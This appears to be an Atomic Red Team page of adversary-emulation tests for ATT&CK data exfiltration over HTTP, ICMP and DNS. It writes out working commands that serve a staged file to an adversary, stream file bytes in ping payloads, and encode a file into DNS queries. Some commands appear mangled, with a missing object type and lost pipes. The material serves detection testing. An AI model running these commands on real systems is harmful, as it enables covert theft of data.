Try it using Invoke-Atomic

Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol

Description from ATT&CK

Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.

Adversaries may opt to obfuscate this data, without the use of encryption, within network protocols that are natively unencrypted (such as HTTP, FTP, or DNS). This may include custom or publicly available encoding/compression algorithms (such as base64) as well as embedding data within protocol headers and fields.

Atomic Tests

Atomic Test #1 - Exfiltration Over Alternative Protocol - HTTP

A firewall rule (iptables or firewalld) will be needed to allow exfiltration on port 1337.

Upon successful execution, sh will be used to make a directory (/tmp/victim-staging-area), write a txt file, and host the directory with Python on port 1337, to be later downloaded.

Supported Platforms: macos,linux

auto_generated_guid: 1d1abbd6-a3d3-4b2e-bef5-c59293f46eff



Run it with these steps!

  1. Victim System Configuration:

    mkdir /tmp/victim-staging-area echo "this file will be exfiltrated" > /tmp/victim-staging-area/victim-file.txt

  2. Using Python to establish a one-line HTTP server on victim system:

    cd /tmp/victim-staging-area python -m SimpleHTTPServer 1337

  3. To retrieve the data from an adversary system:

    wget http://VICTIM_IP:1337/victim-file.txt


Atomic Test #2 - Exfiltration Over Alternative Protocol - ICMP

Exfiltration of specified file over ICMP protocol.

Upon successful execution, powershell will utilize ping (icmp) to exfiltrate notepad.exe to a remote address (default Results will be via stdout.

Supported Platforms: windows

auto_generated_guid: dd4b4421-2e25-4593-90ae-7021947ad12e


Name Description Type Default Value
input_file Path to file to be exfiltrated. Path C:\Windows\System32\notepad.exe
ip_address Destination IP address where the data should be sent. String

Attack Commands: Run with powershell!

$ping = New-Object; foreach($Data in Get-Content -Path #{input_file} -Encoding Byte -ReadCount 1024) { $ping.Send("#{ip_address}", 1500, $Data) }

Atomic Test #3 - Exfiltration Over Alternative Protocol - DNS

Exfiltration of specified file over DNS protocol.

Supported Platforms: linux

auto_generated_guid: c403b5a4-b5fc-49f2-b181-d1c80d27db45



Run it with these steps!

  1. On the adversary machine run the below command.

    tshark -f "udp port 53" -Y "dns.qry.type == 1 and dns.flags.response == 0 and matches ".domain"" >> received_data.txt

  2. On the victim machine run the below commands.

    xxd -p input_file > encoded_data.hex for data in
    cat encoded_data.hex
    ; do dig $data.domain; done
  3. Once the data is received, use the below command to recover the data.

    cat output_file cut -d "A" -f 2 cut -d " " -f 2 cut -d "." -f 1 sort uniq xxd -p -r